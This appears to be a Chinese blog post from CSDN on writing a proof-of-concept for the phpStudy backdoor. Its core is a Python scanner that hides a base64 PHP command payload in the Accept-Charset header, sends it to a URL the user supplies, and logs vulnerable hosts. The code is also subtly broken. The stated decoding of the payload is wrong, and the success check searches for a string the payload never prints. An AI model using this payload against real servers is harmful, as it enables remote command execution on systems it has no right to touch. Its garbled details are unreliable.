phpstudy后门漏洞POC编写

最新推荐文章于 2023-10-16 18:54:04 发布
最新推荐文章于 2023-10-16 18:54:04 发布
阅读量471 收藏
点赞数 2
文章标签: 安全 python
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_41328963/article/details/106243540
版权

漏洞poc编写肯定要有大佬们对漏洞进行分析。
该漏洞网上有很多分析报告,如果是phpstudy2016或2018搭建的就有可能存在该漏洞。
这里仅已验证漏洞为例

c3lzdGVtKCJlY2hvIHhjNjY2YSIpOw==

这里的命令base64解密后为system(“dir”);

接下来直接上代码

import requests
headers = {
            'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3314.0 Safari/537.36 SE 2.X MetaSr 1.0',
            'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8',
            'Accept-Encoding':'gzip,deflate',
            'Accept-Charset':'c3lzdGVtKCJlY2hvIHhjNjY2YSIpOw==',
            'Accept-Language':'zh-CN,zh;q=0.9',
            'Connection':'close',
            }

def phpstudy(url):
    try:
        r = requests.get(url=url, headers=headers,timeout=5)
        if 'shit' in r.text:
            print (u'success: {url}')
            with open('success.txt','a+') as f:
                f.write(url+"\n")
        else:
            print (u'flase:{url}')
    except:
        print (u'连接超时: {url}')

if __name__ == '__main__':
    url = raw_input('\nurl:')
    phpstudy(url)

最核心的部分还是Accept-Charset请求头

插销丸
关注
  • 2
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
PhpStudy后门漏洞实战复现
la-大白
10-28 4808
phpstudy后门漏洞
phpStudy 后门版.rar
09-24
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境。该程序不仅包括PHP调试环境,还包括了开发...
复现PhpStudy2018漏洞复现&检测和执行POC脚本
qq_45031509的博客
07-17 1779
复现PhpStudy2018漏洞复现&检测和执行POC脚本
漏洞复现】phpStudy 小皮 Windows面板 RCE漏洞
做自己喜欢的事,并将其发挥到极致!
02-09 5210
Phpstudy小皮面板存在RCE漏洞,通过分析和复现方式发现其实本质上是一个存储型XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务实现RCE。
phpstudy 最新 RCE漏洞
王嘟嘟的博客
02-04 1357
突然看到这个漏洞,所以起来复现一下,其实没有什么技巧和经验可言,就是一个xss+csrf的RCE。本文仅供参考,请勿用于非法用途。
PhpStudy2016-2018-RCE 漏洞复现
败在我手中之敌,从来不会被我视为对手,我给你时间追赶,直至你遥望不见。
07-14 1269
Phpstudy软件是国内的一款免费的PHP调试环境的程序集成包,通过集成Apache、PHP、MySQL、phpMyAdmin等多款软件一次性安装,无需配置即可直接安装使用,一键搭建。这是常用来写webshell的一句话,请注意使用这样的代码是非常危险的,因为它允许任意命令执行和操纵服务器文件系统。需要注意的是,该漏洞只影响使用了特定版本的PHPStudy软件的系统,具体来说是2018年1月至2019年5月发布的版本。通过利用该漏洞,攻击者可以执行任意的PHP代码,从而完全控制受影响的系统。
PhpStudy后门供应链攻击文档
09-23
犯罪嫌疑人马某在2016年编写后门程序被嵌入到PhpStudy的安装包中,导致数十万用户可能受到影响。 攻击分析: 在受影响的PhpStudy版本中,发现模块`php_xmlrpc.dll`内存在执行额外代码的模块。此后门能够连接远程...
phpstudy后门版).7z
06-03
phpstudy后门版,可用于后门测试
phpstudy后门rce批量利用脚本的实现
10-15
PHPStudy是一款集成多种版本的PHP环境管理工具,但有时可能存在安全漏洞,允许攻击者通过特定的HTTP请求执行任意系统命令,这就是所谓的后门RCE。 1. **PHPStudy后门RCE**: PHPStudy后门RCE是指通过其存在的安全...
phpstudy_poc.py
10-11
phpstudy_poc
RCE漏洞:phpstudy漏洞复现
最新发布
一个努力学习网安的小牛马
10-16 314
phpstudy中存在一种RCE漏洞(Remote Code|Command Execute)由于程序中预留了执行代码或者命令的接口,并且提供了给用户使用的界面,导致被黑客利用, 控制服务器。
phpStudy后门漏洞复现
LuckySec
08-20 5663
0x01 漏洞简介 2019年9月20日,网上传出 phpStudy 软件存在后门,随后作者立即发布声明进行澄清,其真实情况是该软件官网于2016年被非法入侵,程序包自带PHP的php_xmlrpc.dll模块被植入隐藏后门,经过分析除了有反向连接木马之外,还可以正向执行任意php代码。 影响版本: phpStudy2016-php-5.2.17 phpStudy2016-php-5.4.45 phpStudy2018-php-5.2.17 phpStudy2018-php-5.4.45 更多漏洞细节
网站被攻击怎么处理 phpstudy存在后门漏洞
网站安全专家
09-27 3570
phpStudy于近日被暴露出有后门漏洞,之前的phpStudy2016,phpStudy2018部分版本,EXE程序包疑似被入侵者植入木马后门,导致许多网站及服务器被攻击,被篡改,目前我们SINE安全公司立即成立phpStudy安全应急响应小组,针对部分客户服务器上安装该PHP一键环境搭建的情况,进行了全面的漏洞修复与安全防护。第一时间保障客户的网站安全,以及服务器的安全稳定运行。关于该漏洞的详...
phpstudy小皮Windows面板RCE漏洞
今天是几号的博客
04-01 563
phpStudy是一个PHP调试环境的程序集成包。该程序包集成最新的Apache+PHP+MySQL+phpMyAdmin+ZendOptimizer,一次性安装,无须配置即可使用,是非常方便、好用的PHP调试环境.该程序不仅包括PHP调试环境,还包括了开发工具、开发手册等phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。
PHP反序列化漏洞(入门)-魔术方法+原生类
xiaoheizi的博客
07-02 1854
_sleep(): //serialize()函数会检查类中是否存在一个魔术方法__sleep() 如果存在,该方法会被优先调用。当对不可访问属性调用 isset() 或 empty() 时,__isset() 会被调用。因为__toString()魔术方法是在把对象当做字符串使用的时候会被调用,所以这里会触发__toString()魔术方法。__isset(): //在不可访问的属性上调用isset()或empty()触发。
phpstudy漏洞
qq_17054659的博客
01-11 6139
一直在使用的phpstudy,有以下几个漏洞可能存在着被黑的风险,最好能及时修正。 1.通过修改服务器环境内php.ini文件,将“expose_php = On”修改成“expose_php = Off”然后重启php即可。 2.若无需要可以将一些php的危险函数禁用,打开/etc/php.ini文件,查找到 disable_functions,添加需禁用的以下函数名:
phpstudy 小皮web面板 RCE漏洞
Websec
02-23 1419
这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。紧接着该系统的后台有一个计划任务功能,其中可以执行系统命令,所以结合登录处的XSS漏洞可以通过写入计划任务来达到命令执行的目的。可以看到确实触发弹窗了,这是因为整个系统在加载的时候会读取操作日志的内容,因为刚才已经插入了弹窗的xss代码,所以这里执行显示了。只要管理员登录到系统,我们插入的xss代码即可写入计划任务并执行,通过计划任务就可以在服务器上写入文件。访问系统登录面板,页面显示如下。
phpstudy_小皮Web面板_RCE漏洞
Ryan的博客
02-08 491
最近爆出phpstudy 小皮面板存在RCE漏洞,通过分析和复现发现本质上是一个存储型的XSS漏洞导致的RCE。这是一个很简单的1click的RCE,通过系统登录用户名输入处的XSS配合系统后台自动添加计划任务来实现RCE。
渗透测试学习记录 1.5 LANMP ,PHPstudy部署漏洞靶场
m0_55654575的博客
01-16 417
渗透测试学习记录
phpstudy后门漏洞复现
09-06
根据引用中的信息,实际测试发现phpstudy2016版PHP5.4、phpstudy2018版php-5.2.17和php-5.4.45均存在后门漏洞。 根据引用中的信息,后门代码存在于\ext\php_xmlrpc.dll模块中。通过使用notepad打开该文件并搜索@...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值